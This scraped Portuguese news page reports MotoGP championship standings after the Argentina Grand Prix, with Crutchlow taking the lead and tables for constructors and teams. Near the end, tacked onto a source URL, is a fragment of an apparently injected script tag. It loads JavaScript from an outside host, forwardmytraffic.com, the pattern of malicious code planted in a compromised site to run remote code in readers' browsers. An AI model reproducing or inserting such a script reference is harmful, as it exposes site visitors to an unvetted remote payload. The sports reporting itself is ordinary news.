MotoGP

Últimas notícias

Frente fria provoca temporais em Santa Catarina neste fim de semana

Instabilidade atinge todas as regiões, com risco de vendavais...

Notas do Enem 2025 já estão disponíveis na internet

As notas do Exame Nacional do Ensino Médio (Enem) 2025 já...
- Anúncio -

Segunda etapa aconteceu no domingo dia 08/04 (Rio Hondo) na ARGENTINA Número Voltas: 24 Distância: 4,806 km Desenho do traçado:

 

 

 

 

Crutchlow aproveita corrida tumultuada na Argentina e toma liderança da MotoGP. Confira classificação.

Com a vitória no GP da Argentina deste fim de semana, Cal Crutchlow assumiu a liderança do Mundial de Pilotos com três pontos de vantagem para Andrea Dovizioso. A Honda lidera a disputa entre os Construtores, com a LCR na frente da briga entre Equipes.

O GP da Argentina provocou uma mudança inesperada na classificação da MotoGP. Depois da vitória na tumultuada prova deste domingo (8) em Termas de Río Hondo, Cal Crutchlow tomou a liderança do Mundial, enquanto Marc Márquez despencou para o quinto lugar. Com os 25 pontos conquistados em Santiago Del Estero, Crutchlow chegou aos 38 e agora lidera a disputa com três de frente para Andrea Dovizioso, o segundo colocado. Johann Zarco assumiu a terceira colocação, seguido por Maverick Viñales.

 

 

 

 

 

 

Agora com 18 pontos de atraso para o líder, Márquez ocupa o quinto posto, seguido por Jack Miller e Danilo Petrucci. Derrubado pelo #93, Valentino Rossi não pontuou na Argentina e caiu para a oitava posição, à frente de Álex Rins, que conseguiu o primeiro pódio na MotoGP.

Dani Pedrosa também não pontuou e tem o 12º lugar na tabela. Jorge Lorenzo, por sua vez, tem um único ponto e é o 20º na classificação.

Mundial de Construtores

Com a vitória de Cal Crutchlow, a Honda somou 25 pontos na disputa de Construtores e lidera a classificação com sete de frente para a Ducati. A Yamaha tem a terceira posição, à frente de Suzuki, KTM e Aprilia.

 

 

 

 

 

 

Mundial de Equipes

A LCR foi a equipe que melhor se saiu em Termas de Río Hondo. Com os 25 pontos de Crutchlow e os três de Takaaki Nakagami, a equipe de Lucio Cecchinello tomou a liderança do Mundial de Equipes, quatro pontos à frente da Tech3. Yamaha vem na sequência, seguida por Ducati, Pramac, Suzuki, Honda, Avintia, Marc VDS, KTM, Aprilia e Ángel Nieto.

 

 

 

http://www.grandepremio.com.br/motogp/noticias/crutchlow-aproveita-corrida-tumultuada-na-argentina-e-toma-lideranca-da-motogp-confira-classificacao… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

- Anúncio -
Equipe Gazeta
Equipe Gazetahttps://gazetatresbarrense.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.